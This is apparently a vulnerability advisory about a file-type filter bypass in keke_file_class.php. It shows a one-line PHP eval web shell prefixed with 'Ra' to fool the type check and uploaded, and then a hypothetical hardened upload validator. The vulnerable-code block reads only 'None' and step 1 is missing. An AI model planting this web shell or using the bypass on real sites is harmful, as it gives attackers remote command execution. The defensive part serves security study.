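### Brief description:
The file type filter is not strict enough, so the upload restriction can be bypassed.
### Detailed description:
Vulnerable code:
/lib/helper/keke_file_class.php, lines 138~158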
```
None
```
2. Prepend Ra to the shell
Ra<?php eval($_POST[cmd]) ?>
[![1.jpg](https://images.seebug.org/upload/201401/2922005378561da7ff3cb7042a0e1e20d7d93d83.jpg)](https://images.seebug.org/upload/201401/2922005378561da7ff3cb7042a0e1e20d7d93d83.jpg)
3. Upload the shell
[![2.jpg](https://images.seebug.org/upload/201401/29220114f5322df3c21ece71d4caebd5570b77cf.jpg)](https://images.seebug.org/upload/201401/29220114f5322df3c21ece71d4caebd5570b77cf.jpg)
[![3.jpg](https://images.seebug.org/upload/201401/292201316e3ae7c3081f8b6ba7d9d5144ed79900.jpg)](https://images.seebug.org/upload/201401/292201316e3ae7c3081f8b6ba7d9d5144ed79900.jpg)
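A defensive counterpart to the steps above, as an added example that is not code from keke_file_class.php: an upload handler that does not decide the file type from its leading bytes alone. `store_upload` and `ALLOWED_UPLOADS` are hypothetical names, and the example assumes the bypass works because the original check trusts the first bytes of the uploaded file.

```php
<?php
// Added example: hypothetical helper, not the project's own code.
// Assumption: the original filter accepts a file based on its leading bytes.

const ALLOWED_UPLOADS = [            // extension => MIME type finfo must report
    'jpg' => 'image/jpeg',
    'png' => 'image/png',
    'gif' => 'image/gif',
];

/**
 * Validate one $_FILES entry and move it into $destDir under a server-chosen name.
 * Returns the stored file name; throws RuntimeException on rejection.
 */
function store_upload(array $file, string $destDir): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('upload failed');
    }

    // 1. Extension allowlist on the client-supplied name: a script extension
    //    is rejected no matter what the content looks like.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset(ALLOWED_UPLOADS[$ext])) {
        throw new RuntimeException('extension not allowed');
    }

    // 2. Content sniffing is a second signal only; it must agree with the extension.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== ALLOWED_UPLOADS[$ext]) {
        throw new RuntimeException('content does not match extension');
    }

    // 3. For images, require that the image header actually parses.
    if (@getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('not a parsable image');
    }

    // 4. Server-generated name with the allowlisted extension; the client name is discarded.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], rtrim($destDir, '/') . '/' . $name)) {
        throw new RuntimeException('could not store file');
    }
    return $name;
}
```

The upload directory should additionally be served with script execution disabled, so that a file that slips past validation is never interpreted as PHP.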